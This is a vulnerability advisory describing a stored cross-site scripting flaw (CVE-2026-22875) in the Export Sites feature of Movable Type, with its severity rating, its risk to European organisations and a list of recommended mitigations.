CVE-2026-22875 is a stored cross-site scripting (XSS) vulnerability identified in Six Apart Ltd.'s Movable Type (Software Edition), specifically affecting versions 8.0.2 through 9.0.5 across multiple series (8.0, 8.8, and 9.0). The vulnerability resides in the Export Sites feature, where insufficient input sanitization allows an attacker with privileges to inject malicious JavaScript code that is stored persistently on the server. When a logged-in user accesses the affected functionality, the malicious script executes in their browser context, potentially leading to session hijacking, unauthorized actions, or data theft. The vulnerability requires the attacker to have some level of privileges (PR:L) and user interaction (UI:R) to trigger the exploit, but the attack complexity is low (AC:L) and the attack vector is network-based (AV:N). The vulnerability affects confidentiality and integrity but does not impact availability. Notably, Movable Type versions 7 and 8.4, which are end-of-life, are also vulnerable but lack official patches. Although no known exploits are currently reported in the wild, the presence of this vulnerability in actively maintained versions necessitates prompt remediation. The CVSS 3.0 score of 5.4 reflects a medium severity rating, balancing the potential impact and exploitation requirements. Organizations using Movable Type should review their deployment versions, apply patches when available, or implement compensating controls to mitigate risk.

For European organizations, this vulnerability poses a moderate risk primarily to confidentiality and integrity of web applications using Movable Type CMS. Successful exploitation could allow attackers to steal session cookies, impersonate users, or perform unauthorized actions within the CMS environment. This is particularly concerning for organizations managing sensitive content or internal communications through Movable Type. Since the vulnerability requires user interaction and some privileges, the risk is somewhat mitigated but still significant in environments with multiple users or administrators. The presence of end-of-life versions in use increases risk due to lack of vendor support. Additionally, exploitation could facilitate lateral movement or further compromise if attackers leverage stolen credentials or session tokens. The impact on availability is minimal, but reputational damage and potential data breaches could have regulatory consequences under GDPR. Organizations relying on Movable Type for public-facing or internal portals should consider this vulnerability a priority for remediation to maintain security posture and compliance.

1. Upgrade Movable Type installations to the latest patched versions beyond 9.0.5 or apply vendor-provided patches as soon as they become available. 2. For end-of-life versions (7 and 8.4 series), consider migrating to supported versions or alternative CMS platforms to ensure ongoing security updates. 3. Implement strict input validation and output encoding on the Export Sites feature to prevent injection of malicious scripts. 4. Restrict privileges to only trusted users who require access to the Export Sites functionality, minimizing the attack surface. 5. Employ Content Security Policy (CSP) headers to limit the execution of unauthorized scripts in browsers. 6. Conduct regular security audits and penetration testing focused on web application vulnerabilities, including XSS. 7. Educate users and administrators about the risks of clicking on suspicious links or interacting with untrusted content within the CMS. 8. Monitor logs and user activity for unusual behavior that might indicate exploitation attempts. 9. Use web application firewalls (WAFs) with rules designed to detect and block XSS payloads targeting Movable Type. 10. Ensure session management follows best practices to reduce the impact of stolen session tokens.